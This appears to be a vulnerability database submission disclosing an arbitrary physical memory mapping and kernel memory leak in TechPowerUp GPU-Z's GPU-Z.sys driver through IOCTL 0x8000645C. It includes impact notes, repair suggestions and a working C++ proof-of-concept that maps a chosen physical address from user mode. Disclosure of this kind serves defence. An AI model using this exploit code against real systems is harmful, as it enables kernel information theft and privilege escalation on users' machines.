| 제목 | TechPowerUp GPU-Z 2.23.0 Information Exposure |
|---|
| 설명 | An issue was discovered in GPU-Z.sys in TechPowerUp GPU-Z before 2.23.0.whichi is vulnerable to a Kernel Memory Leak vulnerability。
# NAME OF AFFECTED PRODUCT(S)
- GPU-Z
## Vendor Homepage
https://www.techpowerup.com/
# AFFECTED AND/OR FIXED VERSION(S)
2.23.0
## submitter
- aiyakami
## Vulnerable File
- the 0x8000645C IOCTL code
## VERSION(S)
- 2.23.0
## Software Link
- https://www.techpowerup.com/gpuz/
# PROBLEM TYPE
## Vulnerability Type
- Kernel Memory Leak
## Root Cause
- The GPU-Z.sys driver in TechPowerUp GPU-Z 2.23.0 fails to properly sanitize or restrict access when handling the 0x8000645C IOCTL control code. This allows low-privileged users to trigger a kernel memory leak by sending crafted IOCTL requests, exposing sensitive kernel-space data.
## Impact
- Information Disclosure: Attackers can leak kernel memory contents, potentially exposing sensitive data such as pointers, credentials, or other system information.
- Kernel Address Space Layout Randomization (KASLR) Bypass: Memory leaks may reveal kernel memory layouts, aiding further exploitation (e.g., privilege escalation).
- System Stability Risks: Uncontrolled memory access might lead to crashes (Denial of Service).
# DESCRIPTION
- TechPowerUp GPU-Z 2.23.0 is vulnerable to a Kernel Memory Leak vulnerability by triggering the 0x8000645C IOCTL code of the GPU-Z.sys driver
# Vulnerability details and POC
## Vulnerability lonameion:
- **` 0x8000645C IOCTL`**
## Payload:
Example: The attacker specifies an arbitrary physical memory address for mapping and obtains the resulting logical address after mapping to facilitate further exploitation
```
#include <Windows.h>
#include <stdio.h>
#include <tchar.h>
#include <string>
#include <iostream>
#define IOCTL_MAP_PHYSICAL_MEMORY CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL 0x8000645C
#define DEV_NAME _T("\\.\GPU-Z")
#pragma pack(push, 1)
typedef struct _MAP_RESULT {
ULONGLONG PhysAddr;
ULONG Length;
} MAP_RESULT;
#pragma pack(pop)
std::wstring GetLastErrorAsString(DWORD errorCode) {
LPWSTR buffer = nullptr;
DWORD size = FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
errorCode,
MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
(LPWSTR)&buffer,
0,
NULL
);
std::wstring message(buffer, size);
LocalFree(buffer);
return message;
}
int main()
{
HANDLE hDevice = CreateFile(
L"\\\\.\\GPU-Z",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE) {
printf("Failed to open device: %lu\n", GetLastError());
MessageBoxA(NULL, "Failed to open device", "tis", 0);
return 1;
}
ULONG index = 0;
DWORD returned = 0;
MAP_RESULT result = { 0 };
result.PhysAddr= 0xD0000000;
result.Length = 0x1000;
BOOL success = DeviceIoControl(
hDevice,
IOCTL,
&result,
sizeof(result),
&index,
sizeof(index),
&returned,
NULL
);
if (!success) {
printf("DeviceIoControl failed");
DWORD err = GetLastError();
std::wcerr << L"DeviceIoControl failed. Details:\n"
<< L"- Error Code: " << err << L"\n"
<< L"- Description: " << GetLastErrorAsString(err) << L"\n"
<< L"- IOCTL: 0x" << std::hex << 0x80002000 << std::dec << L"\n"
<< L"- Input Size: " << sizeof(index) << L" bytes\n"
<< L"- Output Size: " << returned << L" bytes returned\n";
MessageBoxA(NULL, "DeviceIoControl failed", "tis", 0);
CloseHandle(hDevice);
return 1;
}
printf("Mapped Virtual Address: %p\n", index);
MessageBoxA(NULL, "Mapped Virtual Address", "tis", 0);
CloseHandle(hDevice);
return 0;
}
```
## Below is the vulnerability analysis along with screenshots of specific information obtained during testing and runtime execution using the aforementioned code:
The 0x8000645C IOCTL invokes sub_140001880, where the parameters of the MmMapIoSpace function can be fully controlled by a user-mode process, leading to arbitrary physical memory address mapping.
After mapping the specified memory address, the 0x80006494 IOCTL can be used to read memory, though this functionality is not yet demonstrated in the current Proof of Concept (PoC).
Relevant test files are located at:https://github.com/Aiyakami/CVE-1/tree/main/test1
# Suggested repair
1. **Input Validation & Sanitization**
Implement strict validation of IOCTL control codes in the GPU-Z.sys driver.
2. **Address Space Isolation**
If physical memory mapping is required, validate address ranges and restrict mappings to non-sensitive regions.
3. **Privilege Enforcement**
Require elevated privileges (e.g., SeLockMemoryPrivilege) for critical IOCTL operations to prevent low-privileged exploitation.
|
|---|
| 원천 | ⚠️ https://github.com/Aiyakami/CVE-1/issues/3 |
|---|
| 사용자 | aiyakami (UID 85128) |
|---|
| 제출 | 2025. 05. 19. AM 09:02 (11 개월 ago) |
|---|
| 모더레이션 | 2025. 05. 29. AM 10:27 (10 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 310494 [TechPowerUp GPU-Z 2.23.0 0x8000645C IOCTL GPU-Z.sys sub_140001880 서비스 거부] |
|---|
| 포인트들 | 20 |
|---|